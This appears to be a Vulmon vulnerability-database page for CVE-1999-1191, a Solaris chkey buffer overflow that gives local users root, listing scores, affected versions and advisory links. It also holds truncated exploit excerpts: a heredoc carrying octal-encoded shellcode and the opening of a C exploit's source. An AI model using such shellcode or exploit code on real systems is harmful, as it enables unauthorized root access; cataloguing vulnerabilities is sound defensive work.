Published: 19/05/1997 Updated: 30/10/2018

CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9

VMScore: 730

Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Buffer overflow in chkey in Solaris 2.5.1 and previous versions allows local users to gain root privileges via a long command line argument.

Vulnerable Product	Search on Vulmon	Subscribe to Product
sun sunos 5.4
sun solaris 2.5.1
sun solaris 2.5
sun sunos
sun solaris 2.4
sun sunos 5.5

cat > ps_explpo << E_O_F domain "SUNW_OST_OSCMD" msgid "usage: %s\n%s\n%s\n%s\n%s\n%s\n%s\n" msgstr "\055\013\330\232\254\025\241\156\057\013\332\334\256\025\343\150\220\013\200\016\222\003\240\014\224\032\200\012\234\003\240\024\354\073\277\354\300\043\277\364\334\043\277\370\300\043\277\374\202\020\040\073\221\320\040\010\220\033\300\01 ...

/* source: wwwsecurityfocuscom/bid/207/info The chkey program is used to change a users secure RPC Diffie-Hellman public key and secret key pair A buffer overflow condition has been found in the chkey program Since chkey has setuid root permissions, an unauthorized user may be able to gain root access */ /* * stdioflow -- exploit for ...

NVD-CWE-Other ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-97.18.solaris.chkey.buffer.overflow.vul http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/144 http://www.securityfocus.com/bid/207 http://www.iss.net/security_center/static/7442.php http://marc.info/?l=bugtraq&m=87602167418335&w=2 https://nvd.nist.gov https://www.exploit-db.com/exploits/332/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-1999-1191

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect